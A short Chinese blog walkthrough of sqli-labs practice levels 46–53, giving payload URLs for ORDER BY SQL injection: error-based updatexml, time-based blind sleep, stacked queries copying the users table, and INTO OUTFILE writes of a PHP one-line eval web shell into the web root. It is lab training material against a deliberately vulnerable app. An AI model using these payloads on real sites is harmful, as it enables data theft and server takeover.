sqli-labs less46-53

Posted 2021-03-12 幸运儿mnmnmn

lines terminated

by xxx   以xxx为结尾:
select \'<?php @eval($_ POST[crow]);?>\' into outfile \'C:\\pbpstudy\\PHPTutorilWWW.crow.pbp’  lines
terminated by 0x363636;
最后写好的文件会以666结尾。(详细可 参考: https://www.cnblogs. com/SZxiaochun/p/6027450.htmI

less46

 

根据提示 要输入sort字符

http://192.168.50.100/sqli-labs/Less-46/?sort=1   第一列数据进行了排列

 

 

 

http://192.168.50.100/sqli-labs/Less-46/?sort=2   第2列数据进行了排列  a--z

desc  降序

 

 

报错注入

http://192.168.50.100/sqli-labs/Less-46/?sort=1 and updatexml (1, concat(0x7e,database()) ,1)

 

延时注入

http://192.168.50.100/sqli-labs/Less-46/
?sort=1 and if(length(database())=7  ,1,sleep(5)) --+

 

 

 less-47

基本与46关相同，就是order by ‘1’

 

 

 

 

 

less-48

 

基本与46关相同，但是这一关没有错误的回显，所以只能用盲注的办法：

延时盲注

http://192.168.50.100/sqli-labs/Less-48/

/?sort=1 and if(length(database())=8  ,1,sleep(5))

 

 

less-49

 基本与46关相同，就是order by ‘1’，然后不显示报错，所以也可以用盲注的办法：

延时注入

 http://192.168.50.100/sqli-labs/Less-49/?sort=1‘ and if(length(database())=8  ,1,sleep(5)) --+

 

 

 

 

less46-49的其他打开方式：使用函数写入一句话木马

这里以46关为例，我们首先使用outfile函数：

 http://192.168.50.100/sqli-labs/Less-46/?sort=1 and (select \'<php @eval($_POST["crow"];?>\') into outfile \'C:\\\\PhpStudy\\\\PHPTutorial\\\\WWW\\\\sqli-labs\\\\Less-46\\\\mm.php\' --+

 

less-50

这一关大同小异：

方法一：延时注入

方法二：报错注入

方法三：写入一句话木马  以上三种方法参考上面。

方法四：使用堆叠注入创建新的users表：

http://192.168.0.105/sqli-labs/Less-50/?sort=1;create table ghz50 like users;insert into ghz50 select * from users;

 方法五：使用堆叠注入写入一句话木马。

以上方法都可以，具体参考前几关的文章。

 

less-51

和50关基本相同，order by ’1‘语句数据包裹形式不同

方法一：延时注入

方法二：报错注入

方法三：写入一句话木马  以上三种方法参考上面。

方法四：使用堆叠注入创建新的users表。

 方法五：使用堆叠注入写入一句话木马。

 

less-52

和50关基本相同，但是输出报错信息，所以不能用报错注入。

方法一：延时注入

方法二：写入一句话木马  以上三种方法参考上面。

方法三：使用堆叠注入创建新的users表。

 方法四：使用堆叠注入写入一句话木马。

 

less-53

 

和50关基本相同，order by ’1‘语句数据包裹形式不同，而且没有输出报错信息的语句，所以不能用报错注入。

 

方法一：延时注入

 

方法二：写入一句话木马  以上三种方法参考上面。

 

方法三：使用堆叠注入创建新的users表。

 

 方法四：使用堆叠注入写入一句话木马。